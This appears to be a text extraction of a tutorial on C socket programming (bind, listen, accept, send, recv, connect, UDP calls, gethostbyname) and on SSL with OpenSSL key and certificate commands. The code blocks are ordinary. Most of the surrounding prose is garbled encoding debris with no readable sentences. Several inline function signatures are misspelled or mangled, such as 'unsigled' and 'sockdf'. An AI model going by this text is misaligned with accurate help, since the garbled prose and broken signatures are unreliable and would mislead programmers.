?@ ?@ HTONS_] + , ) 6a - ) " 3 5 <" % P H " ' Bind_] % 5! - N@ , < u $ :3 \ A" 0, 4 , # ("c 2 " 4 5< ?@ 5< G , % ,P 3 ,6 3 " H #_ O* Bind_] 0 ,6 3 - ?@ % 1 0,< N - N@ 2#5 0 - _z …w , _- G ,< ) - P& @ PEAAOR_] + ) :3 - 5< Errno :3 7 L* a Listen_]+ (8! - ^P % ! + 2 b TCP ^ P 6X 0 ), 7 P! _+ N I )- = I.1 $-, 6 U ) , 6, 7 4h @ + b 0,6, G] , G ? I R H 6U) ) " ) T G'7 9P @" = a "7 % ! , (8! 
) - < 7 4 - 5< H X , Q ,/ @)- 5 ,G Q,/ 6X I.12 " ", - " U4 TCP ^ P @^P )$ b'+ 2 TCP ^ P 0 F? " 2, A) G -, 6 U ) 2#5 ? " 6 9 F 7) Y ) 4 , , , % ! 2 H B / # < (8! % ! + #@ , Listen_] B ( '0,< W 3 7 4 - 5< Int listen (int sockfd , int back log ) ; 0, - E ?@ , L* ?56a Sockfd … 5 " 0 I -, < = 0 erno u ) ,G Q ,/ a Backlog … ) nB G 7 9P , 6 3 …w+ 2 , backlog , -,< ),. pq :3 ") 7 B P H+ 0,< - ,3 , 56 :3 - 5< Accept + a < H ?@ ( Y - < ) _] + ) 4 TCP ^ P 6 H) 0 < 2 " , M 9 7 B 5! , PB : + b % ! >/ / @)L* T) L* F accept accept() 0,< 0,6, % 1 2 56 ,6, ( E 5< E () L* nB G 7 9P " I -,< = - Y nB G 7 9P " 7 9P % -,< = ("c 0, , accept() ) -, @ 2 7) Y 0 # A R4 T) L* 2 ) 7 !89 T 0,< 6X 2 € - Y ] ) # -,< = , ,F accept() + , " U4 < O* % ! 0, , + 2 $ ' R4 _ F) 7 # nB G 7 9P 2 " , , ,F 5< " ,< F listen_] + X " 5< ) 4 7 L* @)- I < - N nB G ) -,< = X % .% ), ) ' 7 9P " " _=1 / () " _O # L* a 0, 2 0, "7 + B( ' #include <sys/socket.h> int accept ( int sockfd , void*addr , *addrlen ) ; 0 T Socket _] + -, @ + 2 M 9 IP h @ ) 7 4? ! 2 L* @ 5< 4 h @ nB G^P 0,< 'G C 8P H # , 3 - < a Addr … ` A R4 " U4 % ! 
0, 5< S / addr a Sockfd … ?@ ` , ^P % T 9 a Addrlen … H- Y u ,G 1) :3 ?@ - 5 < a L* - Ÿ + 2 , :3 , < _…w] , 0 % H errno ,6 3 , B ?,< 2<) 0 "(5 TQ

#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>

#define MYPORT 3490   /* the port users will be connecting to */
#define BACKLOG 10    /* how many pending connections the queue will hold */

int main(void)
{
    int sockfd, new_fd;             /* listen on sockfd, new connection on new_fd */
    struct sockaddr_in my_addr;     /* my address information */
    struct sockaddr_in their_addr;  /* connector's address information */
    socklen_t sin_size;

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)  /* socket() returns -1 on error */
        return 1;
    memset(&my_addr, 0, sizeof my_addr);          /* zero the struct, sin_zero included */
    my_addr.sin_family = AF_INET;                 /* host byte order */
    my_addr.sin_port = htons(MYPORT);             /* network byte order */
    my_addr.sin_addr.s_addr = htonl(INADDR_ANY);  /* auto-fill with my IP (all local interfaces) */
    if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof my_addr) == -1 ||
        listen(sockfd, BACKLOG) == -1) {
        close(sockfd);
        return 1;
    }
    sin_size = sizeof their_addr;
    new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size);
    if (new_fd != -1)
        close(new_fd);
    close(sockfd);
    return 0;
}

, ,F " 60, ' - Y $ T , N accept()+ b N ?@ L * recv()) send() + )- - Y % H 5 a ) -, 6 U ) "7 + ) 5 + ) 2 B ( '0, 6- 1P

int send(int sockfd, const void *msg, int len, int flags);
int recv(int sockfd, void *buf, int len, unsigned int flags);

0 -,< z * E@ " accept() + " -, @ 1 60, < _ ` T 0 Y ?@ b' 6 B . a Msg … @ %Q] I'/ H TCP ) ' S / ' 2 ;. 5 iX a Sockfd … L* " - 1 ,B'?) ) T 9 a Len … 6- a Flag … , `4 " & 6 4 0, RN ' 6- B . h @ recv() + I'/ 0 7 1 ) 0, , 6 3 …w :3 d* X S / len u 6") ' ,G -, " ) ' 7 1 ' 4 2 a Buf … H E@ + ) 2 6 , ,G $ PQ ,! 1 ,G 2#5 , H 0,<P? # , + , H wqqq , len 1 ), - ] 1 6- % " †qq 7 0, d * 5< , 2 @=B # , send() + b T /, # T u 6- e 'TQ ? ! 0, < pqq 5< -, -, E/ , H _ ' G B / 6 a 0,< \ ? 6- 6 ) A /) b 'recv() ) send() + a # ' )T ) UDP A) ( B , 63 1 ) œ, P , , T shutdown()) close() + , 5 ' T - 0, , P ) < N" ^P , ^P ,< M 9 ? " , , < " " ? " 6 B', 562# 1 ) a close()+ "7 B( '

close (int sockfd) ;

+ L* + b ,< ? 56 sockfd L* 0,< ,6 3 - Y % H ' 2 0 I & )T a Sockfd … L* , H 0 accept() -, socket() I ) nB G 7 9P ( 5 N close() + b < 9P 0 % !
7 9P = a TCP 7 9P " ), A" 4 $- # TP H / ,,P N ^P - X 6 ?@ F , 0, 'X nB G ?@ B ( ' ,<P shutdown() + "7 ,6 * 2 N - Int shutdown (int sockdf, int how); 0 I a " ? `56$- R4 " , T 1 ) " 0, 6- "@ ' "@ 8 C g - ' a Y ) ) '% ! 2#5 g - 2#5 g ' , 6 3 …w + 2 , 0, _TCP %# ) 4 . a, -, 6 U ) H- Y 5 , G A" :3 ") 4 0 aw , … 0 " ? `56 )T ap , … %5! close() + 0, 5 u ) , … T F) 3 ' % ! - A) a How … 2 ^ " ^ , 56 1/ 2 0 < # 2#5 ?@ 1/ 0, " a Sockfd … L* 7 B P H+ , 56 :3 - 5< errno P] - Y 4+ , , < 'G 5 P, + G T/ 0, < E - Y + " # 0, ) + 2 F) -, 6 U ) ) Yˆ 6 E 0, Y -, 6 U ) < 5 connect() + b (E , F) 5 - Y 6- ^P H %5! 2 < ' R4 X ' 0, , Pshutdown () socked_] X -, 6 U ) C 5 " 2 0,< ,6 3 0, CH , _=1 - Y ,< 'G B P H j* 0 ?@ ) , , ( N6 _O , < I ,H iX recv() ) send() + )T close () + b 5 " _z -,< E ^ P C _ connect + ) < listen () + 0 connect () + " -, 6 U ) - Y ) ,< -,< F I ,6 3 & @ ' + 2< ^P ) -, 6 U ) E - N@ , < -,< a H accept () ) 3 ' connect () + "7 B( ' #include <sys/types.h> #include <sys/socket.h> int connect (int socket, struct sockadr* serv_ addr, int addrleny); 0 Socket() + -, @ ` 2 3 ' Sockdf \ " 0, < 'G C 8PH 0,< ,6 3 2 G ,L / ? ), #B, - 5 <2 %L , ? ! h @% 5< 5 S / I ), 0, ? O* 5< -, 6 U ) / (8! % ` a Serv_addr … 0 2< IP h @ -" , : Addrlen … B P H ` H sizeof(struct sockaddr) -, 6 U ) 4 h @ ? 56 a SOCKDF … 7 4 h @ ) ,L 'G 0 % ! L* 3 7 4 h @ 5< 5< , 42 H # 2 ' L 7 4 - 5< H) v 4 , 8 C R4 X 3 9 5 2 -, 6 U ) ), < - O* % ! ,6 3 M 9 & 3 7 4 h @ $^ P -, \) < ^P , ,< d * ) [, C G:H -, 6 U ) 7 4 0, 5 \) < , 6 3 …w + 2 TCP ^ P , 0,< H - :3 - 5< errno Ÿ UDP A) a( , , (E ( T /0 \ A R4 ) ) UDP A) \ ' (,! 7 ' u ) ' ' )T )T $T + ? 7 0 -, 6 U ) socket () + 4 3 ' 2 0, E ( 5 … \ " _=1 0 < ( E SOCK_DGAM _ bind() + ' - ]0, 6, GH h @] š ,P P ]0, ? I 6- 7 4 h @ -,< E ' I , 'X h @ ,< A" 4) ' - 0 ,6 3 R4 ?# T 0 < ( E sendto()) recvfrom()+ B _O ˆ 6?), _z H) _,6 5 ( GT ) -,< d * _7 4 )IP \ ' 0, , P )T -,< E C _ 5 4 ) socket 4) socket() + ] 0, E ( … \ " _=1 _ SOCK_ DGRAM] 0, 5 T -, 6 U ) , 6, 5 )T 5 G 6- 0, 5 T ? 
6' - $, < # <, N , 'X 1 ˆ6?), ,< " -, 6 U ) " 0, , P "7 ( 5 P- 5< " ' -,< E T 6_O # H) -, < 3 < -, 6 U ) 0, 6, ( E a - + _z B( ' Int send to (int sockfd, connect void* msg, int len, unsigled int flags, const struct_to, int tolen); 0 z * F socket() + -, @ E@ " 1 6- ( 2 0 -, 6 U ) Y d* 3 7 ?@ H UDP ) ' 0 0, N I H %. h @ a Msg … I'/ ( 4 2 ' 0 <T S / ?@ C 8G'$;. ?) 4 - 5 < 2 `56) , L a Flags … , ` 4 " &6 4 2< a TO … ` IP h @ , ^ ) -,< ( 4 T 9 a Len … 1 Sockaddr \ " 8PH C a sockfd … L* ` 0 < I size , sockaddr ` ?@ , I of (struct sockaddr) 0 T ,G send() + , 56+ 2 n' % ! , , 2 :3 , < _…w] # -,< T 6 T , ,G , 6X , errno # 6" 0, 5 0,< B / ") B1 T 9 a Tolen … H 0 u @T 2 `56) - "7 -,< ?@ :3 - 5< X ,G 3 2 C 5/ 0, N I a , ( P- B ' + & B( ' Int recv from (int sockfd, void buf, int len, unsigned int flags, struct sockaddr_ from, int_ from len ); 0 ,6 3 -, @ H %. ?@ F socket () + ' 6- ( % ! L* I'/ " a Sockfd … B . h @ a Buf … 0 _ S / ] < ' , 4 T 9 a Len … ) ,< ?@ 3 5< ) I ,P socaddr \ " ` a From … 7 4 h @ ) IP h @ 7 L* ?@ % ! 8PH C 0, 0, 0 A" 4 -, I ?@ % ! 42 0 -,< ' Y ?@ a Flag … ` T 9 a Len … ,G & + 2 0 / 56 , ' a #P < #P< , 0 63i 6 6 N + @2 5 " , Y+ -,< 'G 5 3 6- 0, + 6, @ " g ),Y a getpeename() + include<sys/socket.h> int getpeername(int sockfd, struct sockaddr_addr, int_addrlen); ) 47 4 h @ ) IP h @ % < $% -, < = G % •7 + 2 M 9 6 6, + 2 " - Y 4 0, 5 z * ^P % M 9 a I 2 0 -,< = G ?@ 0,< ,6 3 4 % 3 8P C H sockdaddr \ " M 9 7 4 h @ ) IP h @ % ! .sockaddr u ) , 6 3 _…w] , ` l '+ n 9" @ C5 / , ?@ , A 'U LE \ " 5 < 2 < 0, : Sockdf … ` a Addr … b ` T 9 a Addrlen … ' (, ! 7 :3 - 5< errno 0,< ,6 3 I :3 \ h @ ) IP h @ S L* 2#5 ) % ,P ,< - < ?@ # BE 7 7 4 Š j* G gethostname () + ( 2 $, ,6 3 $ < F ?@ ) _ www.ibm.com C 8Q) ?@ IP h @ 5< < ( + 2 2< 2 5 ( a TG < "7 + B( ' #include <unistd.h> int gethostname(char *hostname, size_ ); U4 _ < 7 P ! ] 6 " 0,< ,6 3 - 3• E @ 0 :3 - 5 < % P H , 56errno 0 2 , )- ") ,6 3 Y -, 6 U ) -" / ( , G 0, 5 ) ,L a b. 
3 E < E , )# K 1Q - Y ?@ IP h @ " C 5 e '2# 1) , h @? ! N 8P C H X N56 , 1 ) #B 5! " 9 ) DNS 5F H 5< , DNS @ 5F 0,< ;. ?@ ^P < T 9 a Size … , , %5! l '+ '?@ H) E " " :3 ,< _…w] 0, 5 - Y W 3 2< 2< ( + S / a -" / -, a Hostname … @ -, 6 U ) " B( ' -" / ( h @ , ,@ 2

#include <netdb.h>
struct hostent *gethostbyname(const char *name);

0-, 6 U ) 7 ?@ 3 hostent \ " < a Name … -" / ( ` h @ $+ a , -,< = G "

struct hostent {
    char *h_name;
    char **h_aliases;
    int h_addrtype;
    int h_length;
    char **h_addr_list;
};

8Q C , 6 3 -" / ( < 2 #P< ] 2< ( a h_name … 5 _www.ibm.com _ < , , B'2 #P< 3 wq < 2 ] 2< , <- < ( a h_aliases … G 3 a h_addrtype … N 56] h @ - _0 < ,6 3 AF_INET S / h @ T 9 a h_length … -, 6 U ) 2< ^ IP h @ ?@ 0 < , ` ), ` I errno < 0, - < u $? &@ - < B PH + M83 ) $? u 0 < ' :3 \ = ‰9 < 2 0 c + &@ ' 7 2 NULL , 7 herror 5 ) X TQ 3 |q ' 7 ,6 3 I I H _ h_addr_list … < u ?@ H g ) 2 g + 25X F) + 2 H , F ) ,< ,6 * herror() 5 a, H ) +' " F)

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc, char *argv[])
{
    struct hostent *h;

    if (argc != 2) {  /* error check the command line */
        fprintf(stderr, "usage: getip address\n");
        exit(1);
    }
    if ((h = gethostbyname(argv[1])) == NULL) {  /* get the host info */
        herror("gethostbyname");
        exit(1);
    }
    printf("Host name  : %s\n", h->h_name);
    /* h_addr_list[0] is the first address, already in network byte order */
    printf("IP Address : %s\n", inet_ntoa(*((struct in_addr *)h->h_addr_list[0])));
    return 0;
}

E )- ' ) )? ! 0, k F) 3 ) 'b3 ) ( ' Enter , B) < ) IP h @ 7 L* a ? getip -" / ( h @ 7 2 ( ?@ 5F " A" c " 7# 2, l ' 9_=1 13 B ' -" / ( B F U )- Œ aTQ 0, 6 $getip www.ibm.com , IP +H ) h_addr_list u 6) @ #P< , -, < - 3•BE 7 ( Y : ' - < L 1 ) < ?@ T) 1/ F) 3 ) k T G IPh @_O -" / ( h @ 3 |q , < b '5 < , h @ % ,P 7 6 l' 8G' C 0, , " inet_ntoa() + " _pws 0w{q 0w†}žw‹q C 8Q] 0 in_addr \ " ` P E 2 ?@ 0 ) )? @ inet_ntoa() + ) ,< = G ?@ 3 -,< •\ nP : • %5!_z %L' , 5 3 lY %5! 1 ) 2 5> ) ) 4 " •\ nP: • %5!
0, ' Q $X SSL g( [Secure Socket LayerZ a – N& 5 3 6 T F 2 7 !89 T P '9 6, ) 6- 0, , < / 9 78# 2 " -,5! %# 5 $ 6- N ?,< nK' " . " , N& P ! 78# 2 0, ' P ! -,5! N& … ? 6? # ) " , 6 & , B) ,B , F ) , ,F 0 6 6 ( ? 21 ) 0, ) ) ?@ c ! 0 * & ( ) " N & A) ) 6 P. % H 6 ) " ?@ () %# F N& … N & , B? , B T P A) 2 %# 7 2 T %# 0, < - 4 1 g CP 6( 6 P . m.1 & 3 b' , F ?@ - 0, F A) 2 F j & " 0,< & A L3 , B ) M 9 " ( u4 , Gœ L3 , B) # & ) -,< B ), , < 2t5: F N& … %#< N& A) 6- . !89 , 6 * ? N ' n 9 @ ? )@ 5! , B " ? N ) , & A ? 59 ? 6? <& , B ) 2 " , T 3 , B) N,56 ) " N ,B ,B 5! , B ) bP 1 < 6 V ? 5! , B ) -, N & A) ) ? , , 6 #P < <) 0-, a" , – 0 2#5 L3 , B 0 < 2 5! , B ?@ , Z> - Y ( u4 ? " 5! , B n P : A) 2 0 < ?@ , * , u4 ,6 * ?@ D B %# A 0 ,B 3 " %# 2 %/ x 0 5! , B k F % / 0,< \, ? 5! N& …p %#< N % H"E g 6 'L ? E/ ? F b ,B & 5! , B -,< T, ) 1 , B" - Y ! 'L ? , -, m .1 ? , B 0, 0 < - U ), 7 !89 % ?@ " - Y ?@ N 7 !89 ? & n 9 " , & 7 !89 N 6 H- Y . … . " I . 0,<P ' N1, @ 7 !89 • & '7 !89 - 56) 'L ? < & -, , B 0A L3 0, & 6- 5 0 % / -, -, < T ' $7) Y 7 L3 , B % ? "@ -, Hash 5 6- , , ' & 0 < - 1E ,4), > 0 ' B ( u4 - 56 5 … 5 " L3 _ 1 E ( u4 ) ? ? 6( u4 Hash /? & ) 1 ?@ Hash + 6 u4 m .1 , < ? # Hash L3 , B ? 56 6 2#5 I , P. > ] < 7) Y Hash g P . -, ' > U 7 ), O / $, 6 ( u4 Hash ' ) 2 ), , ' " -, ' 0 < 6- 5 5!, B 1E " / 6- 5 ) F ) ( 4 n,L … ?@ b 6 L3 , B L. P! ?& ) < , h F n,L F n, L 0 @ F ? "@" - Y , , 1E 6 b F 6 Q 1/ < $ < ( E P! 5B ) 6 5! , B bP ( u4 n, L 0 6 - Y -, < (E 9 ,# c 5G %5! C 0 6- < ( E 6- ™Y/ 6- 4 •A) ) S n, L ( u4 , P 0 F L3 , B 2< ?@ h 5 ) ( u4 n, L +H ) A" F n,L d* , ,F - ()&B) ("c 6) #1 " ? 59 ?& h 5 5 5 0, N,# , A" ( u4 ,P n,L 6 0 -, ! 6 5! , B] , 6 T. 6 ? v ') 3 U) ? 2 4 i: N 1P 0, < 60, b 0 2 6 3 = D) , 6 2 " M, 6, 6 % # S , $? 
@ 6 - E" U) 6 ?@ U) ) _= B* 6 U) 0,< 5 ™Y/ 2 X YD) 6 %3 6 U) F 6 , ?@ -, 6 U) 6 S BB S " U) F 2 0_, , 6 U) - 4] … A W L* 2 ), - , P G< 2 3@ " 6 6 > )( % < 6 > 0 < Z> A 3 a SSL %•) 4 H- Y #P< ) TCP/IP % # ) 4 c c 6- TCP/IP %# ) 4 )T HTTP) LDAP) IMAP , 6% # ) 4 ) 0, < F SSL %# ) 4 …‹ %#< c" c ) 3 6 c" ,6 -" F SSL BH < -,6 l '%#< !89 ) , 5 E , ) F N& 2 T L SSL U) U) M 9) 5! , B ) 6 % BH 2 a SSL -, 6 U ) &'( P! " 0, 5 % 5! , B ,6 -" F -,<, 7 67 P [ … / ? 59 ) N& T U) a, ?# 2 9 ?56 SSL 0, @ ) R 4 ? # & % 5! 2 U #!] , 5 7 P [ SSL 2 `56œ_ ? 2 4 SSL , 6" ,6 # " - Y $ ) 6 ), & , , 0 U) 6 ,6 H 2 `560, 5 % 3 5! % H 6 ), BH 2 a SSL -" F ) / ? 59 & 1 U) 67 P[ 0, 5 , ,6 -" F U) ) ) &'( BH 2 a SSL 2 TL ) 0, 5 1P -,< & 7 ) SSL Record protocol a = G 6- SSL ( u4 1P $ 6( u4 2 %# ) 4 protocol SSL Handshake % # ) 4 " - Y - . & SSL 1P " M, 60, 5 SSL = G 9 P %# ) 4 0, ) ) U) a 0 ?@ M 9 ) 6 9 ) !89 K &F % # ) 4 ) " SSL % # ) 4 -, < % # 'SSL T ? ) U) " M ,6 U) b 6 ) 67 P [ N& N1O * 0, _ 3] ) U) <,B 5! , B , - Y U) < , B) 5! , B N& % " g@ SSL Handshake ( u4 5! , B " - Y <,B 3 ( u4 & U) SSL -" F ) B F 6 ) N & TL N& " 0,< A 3 G F " ? 59 ) 6) 5! , B G U) U & $ 6- ? )@ 67 P[ % < , 9P %# ) 4 P SSL % # ) 4 <,B K ,6, -" F ) E SSL $ 0,6 67 P [ N& " - Y SSL -,< 0, 5 P 4 N& 2t 5: 6 %# ) 4 " '2 0 œ, 5 7 P [ U) & " '2 0 , B 2 0,6 H- Y 0,< a, -,< - )@ " 83 9 %/ 2 'L - T $& " SSL * N1- Y SSL ^ P U) - 5< ) ) U) !89 N ) -,<, 1 0, 5 U) 3 6 U) 6 3 ) -)8! ,< Y T) B / ,< U) !89 & 6, " 0, 5 0, ) 6-, < T N& T L E ?# ) , b T T & !89 " - Y (8! , U) 7P [ ) 6 0, 5 0 ' N1 ( ') F )@ & ) -,< 1P T. & ) 6- 5! , B E T ) 0, 5 ,B -)8! 0, U) T 6, g - Y U) ) G œ, ,< 3 6 ) ,< - 5 3 TL 1 ) , . ,B & F) U) 1 ) . ,B ?@ -,< & 67 P[ 3 ) - 56 -,< Z> ( u4 U) , " - Y ?@ ) - ) 1 ) 67 P [ . 3 U) 6 A 3 L3 , B " ) ) 0, 5 U) 7 2 0, 5 , 5 ,1 1P SSL ? ?@ " - Y ? 59 T T9 B F, B 1 ) . , B" - Y T9 !89 0,< B F 2 `56œ < ( u4 . 2' & ) u" U) ? ) ) ) <,B N& , B 2 " - Y G -,< 1P 7 !89 0 B F, B B ) T 6( u4 ,6 \89 ) 9 P " '2' ? 
4 -, < & u4 B ) ( u4 U G F" % / U) œ,<, 6 3 & 0, 5 0,< 9P " '2 ' ? 4 , ' u4 U) & ) U) 0 SSL -,< <R V < G F " ? 59 ) B F , B ) -, & $? )@ SSL (5 & B F, B 2 " ) 0, 5 6, 2 G g ) $, - Y ,< - U) 5 3 TL , . ,B & 1 ) 9P " ' - Y 67 P[ U) 6 A 3 ) 3 6- ) 0, 5 U) L3 , B " ) 7 0, 5 , 5 ,1 B F, B 1 ) 1P SSL " ? B F ?@ " - Y ? 59 T T9 . , B" - Y T9 !89 0,< 2 `56a < ( u4 U) ? N& ) . 2' u" ) ) ) <,B N& , B 2 " - Y G -, < 1P 7 !89 GF 0 B F, B B 0, 5 T 0,< U) 6( u4 ,6 \89 ) 9P " '2' ? 4 0 , SSL -, < <R V < G F " ? 59 ) & u4 B ) -,< & ( u4 9P " '2' ? 4 $? )@ ' U u4 B F , B ) -, U) U) & B F, B 2 " ) - Y a ) 9 ?560 6 , ) T T 6 ) " , 6 " ) U) 3 6 " - Y U) ) SSL 6, SSL 6, P! ? " 0 Fv s B / +:H 6, 667 P [ U) &'( 0, 5 7 P [ U) U) ) ,< Y SSL 9P " ' ) &'( a, 6 ) SSL 9P " ' (5 & / a,< , 6 3 & 0, 5 " p B / % € 0, 5 ' P Qv 4 " 6 @ PG ) , @ ',< -,< —> A 3 6 0, 6€,< U) 2G 5! % H 6 12 0 6 3 5! % H 6 -, ( 2 0 3 1 & 6 U) ) , - )@ -, 6,<P 6 " ,G ) ), 6 & 6, # ) # ) #1 > " 6 7 !89 ) ,< - : -, < - Y ) , u 6 6 ) 1 5! , B @ : ) # ) #1 > ), ( & b ?@ > L3 , B 6 0,< ,6 * , ) ) 6 -,< +H ) ) U) ( #P < ?56 P Q l '7c (5 a (E * + " 6 2 " - Y 6, B E … CRL ) CSR $ 6 , ( u4 -, # & E SSL Shell n 9 " 0,< DSA ) DH $ RSA x.509 C GH ) openssl 7 # " - Y ? @ v 4 0,< ,6 * OpenSSL 0, ?@ ,6 * & > , , 5! , B " - Y -,< • 6 g 3 6 B / 2 € 0 2 & U) 1 ( 2 ), 0, 5 5! , B , TL 7 ), 6 @ " DN ,B' 1 -, @ 6 < 5 , -, 1SSL 0, 5 'X €, 6 " & 6) ), ?@ N & ), R4 3 5! % H 6 U) ), 6 N1 B ) TLS ) SSL E … P. … & )? U) ? … S/MIME -,< & 6( u4 , … a openssl " ) ) & … ' Openssl command [ command_opts ][ command_args ] 2G - #B 5! \ ,< Y? " – 0, - 56 N - 7 6 @" " - Y & 1/ 6 , ) ;! 2 0 < & U) ? passphrase 2 ? ) ) S F ( 5 ?, E , ) ) ?, < ? - Y 7 passout " (, " 6S 6 " passin R 10, < 0 < 6 , B2 < " passphrase ^ < F? 5 # &' >/ passphrase 5L ?# 2 " - Y 6 & " ' & b passphrase 5B 0 d* , < ? ) _ F) 3 passphrase ) )" ^ a " & ) 2 openssl 4? ! - Y passphrase 7 P! " …pass : passphrase 0 < 0 < - Y passphrase ?, 3 " 0 < - Y ? 
&56 9 ( 5 % < T) L3 , B 6) < ,< passphrase # ? 1/ 2 6 6 ) F ( N6 ] passout- passin S L3 , B -" , - 0, ) # " %P H 6 G ?, 2 0 Y 2 " ? L3 , B 2 " -,< , 1 2 , 3 % L3 , B 2 " - Y F ( N6 < - Y U ) 9 6 2 N M 9 " 0,<P - Y % H ?,< -, " 7 , M 9" 7 passphrase , ^ & ", 2 ( 5 x509 ) genrsa req , rsa " H P 10, $, , 1 CSR 2 U 3b 6 # 0 5 - Y ), 0 < > (E ? , 1 ( N60 < - < 2 0 6 4 PU ) 3 ' ) 0 ),G -,!" - Y ("c SSL ), 0 <- command ,G L3 , B , 5 T 2 < , - Y var :. u , " env:var pathname % 'T) : " file:pathname -passout ) -passin & ) % ' " 0 < passphrase ?, 3 () ) ) passphrase ?, : " ) 3 T) : 0 < - Y passphrase ?, 3 , < number ?@ M G - 5< - Y F) 3 B'" fd:number 0 < e 'j 4 & " #B 5! 2 < >G - 56 manual 7 .Y -, 3 , ) )" 9 0,< 5 stdin " - Y Passphrase - stdin " x509 ) req , rsa , genrsa 7 7 2 0 < U4 ,G - 6 5 H iX @ T) , 0 6 F) @ a genrsa %# < 2 RSA B ( '0 ) L3 , B , 1 2 0,< "

    openssl genrsa [-out filename] [-passout arg] [-des] [-des3] [-idea] [-f4] [-3] [-rand file(s)] [numbits]

aT) , -out filename < < ?@ F) 3 L3 , B - Y F) 3 % '( & 2 " 0, < -idea -des3 -des & IDEA DES3, DES 0, - Y 6 & 6 d* < stdout N1" # " L3 , B ? -passout arg DES3, DES ? d* a, 0 N1" # " $ <- Y , B ? 0 < numbits 6 - Y & 2 " Šwp ?@ e Y 4 , , 1 passphrase ?), ) IDEA & F) 3 % 'passphrase ›, d* wqp‹ T 9 , BT 9 L3 , B "

    openssl genrsa -out rsakey.pem 1024

) DES3 N1 -, < & wqp‹ T 9 L3 , B a, " , 1 W 3 passphrase

    openssl genrsa -out rsakey.pem -passout pass:enter-pass-here -des3 1024

a rsa ? 2 " - Y 6, B' , 0 u a,< 0) @ . 0 " %#< RSA 6, B % ,P N ' 2 , B ( '0 5 -,6 2 ' " 6, B , B =B*

    openssl rsa [-inform PEM|NET|DER] [-outform PEM|NET|DER] [-in filename] [-passin arg] [-out filename] [-passout arg] [-sgckey] [-des] [-des3] [-idea] [-text] [-noout] [-modulus] [-check] [-pubin] [-pubout]

aT) , - inform NER, PEM , , NER, PEM? 
, d* , 2 G L3 , B ) )" F) 3 , B ) ), B % < - Y & 2 " ?@ passphrase , < -, < & & ' ) )% ' 0 < -passin arg d * ' PEM ?@ e Y 4 , 0,< DER 0 -in filename , ) ), B PEM ?@ e Y 4 , 0,< DER 0 -outform 2 G 6 & -, 3 ) ),B 0 < -out filename " 0, d* < , -,< < ?@ F) 3 L3 , B F) 3 , B B' - Y & 2 0 < -passout arg d * ?@ passphrase , < -, < & & F) 3 , B 0 < -des -des3 -idea ? IDEA & DES, DES 6 0, -text 7 -, < , 1/ -noout F) 3 - Y -)8! 0, N1" # " L3 , B L3 , B ' F) 3 & - L3 , B 6,B'-,< , ( ' & 2 " Y 0, < 5 -modulus 0, 0, V4 6D F) 3 L3 , B 6,B' 6D , B modulus 5 H passphrase "

    openssl rsa -in inkey.pem -passin file:pass-file -out outkey.pem

-, 3 , ) ) " passphrase] , & L3 , B " a_ <

    openssl rsa -in inkey.pem -des3 -out outkey.pem

a,6 ? L3 , B 7 . "

    openssl rsa -in inkey.pem -text -noout

a req , B, 1 ?@ " ? a,< , 60 < " %#< 2 - Y CSR , B ( '0 5 - Y & 2 " 6 ) L3

    openssl req [-inform PEM|DER] [-outform PEM|DER] [-in filename] [-passin arg] [-out filename] [-passout arg] [-text] [-noout] [-verify] [-modulus] [-new] [-rand file(s)] [-newkey rsa:bits] [-newkey dsa:file] [-nodes] [-key filename] [-keyform PEM|DER] [-keyout filename] [-[md5|sha1|md2]] [-config filename] [-x509] [-days n] [-asn1-kludge] [-newhdr] [-extensions section] [-reqexts section]

aT) , -inform NER, PEM , , 0 -outform NET, , ) ),B F) 3 CSR 2 G PEM ?@ e Y 4 , 0,< DER d* CSR ) )" ) ) CSR , , % < & ) )% ' - Y ?@ passphrase , < -, < & & 2 7 -,< , 1/ -)8! 0, -noout -modulus F) 3 CSR 6 D F) 3 ' d* CSR 6,B' F) 3 6, B'-, < , ( ' & 2 " CSR %3 -, 3 ) ) CSR 0 < -text - ' PEM 0 < -passin arg ' PEM ?@ e Y 4 , 0,< DER , 0 -in filename " 2G 6 & & Y 0, < 5 6D 5!, B modulus 5 H 0, -new 7 !89 ) E < CSR 0 < - Y -, < d * _0 < -newkey rsa:bits CSR -keyout filename E ;! ' , -key & 2 " - Y ) )" & " , B " CSR & " ,1 ,B ,< -, ) PSA L3 , B 0, d* ,B 6 < < ?@ d* ] & 2 " - Y ,G Bits 0 < L3 , B B'( , -x509 E root 6 CSR < F ,1 & 2 d* & 2 " - Y 0 < -days n P! ?& n ,< -,< - Y -x509 6 & " 0, , 1 CSR a, L3 , B d* " - Y "

    openssl req -new -key key.pem -out req.pem

a, , 1 ? &56 9 CSR ) L3 , B "

    openssl req -newkey rsa:1024 -keyout key.pem -out req.pem

a, , 1 ? &56 9 root 6 ) L3 , B "

    openssl req -x509 -newkey rsa:1024 -keyout key.pem -out cert.pem

x509 B ( '0 < - Y 6 ), & b 6 a,< , 2 " " %#< 2

    openssl x509 [-inform DER|PEM|NET] [-outform DER|PEM|NET] [-keyform DER|PEM] [-CAform DER|PEM] [-CAkeyform DER|PEM] [-in filename] [-out filename] [-hash] [-subject] [-issuer] [-nameopt option] [-email] [-startdate] [-enddate] [-purpose] [-dates] [-modulus] [-fingerprint] [-alias] [-noout] [-trustout] [-clrtrust] [-clrreject] [-addtrust arg] [-addreject arg] [-days n] [-signkey filename] [-x509toreq] [-req] [-CA filename] [-CAkey filename] [-CAcreateserial] [-CAserial filename] [-text] [-C] [-md2|-md5|-sha1|-mdc2] [-clrext] [-extfile filename] [-extensions section]

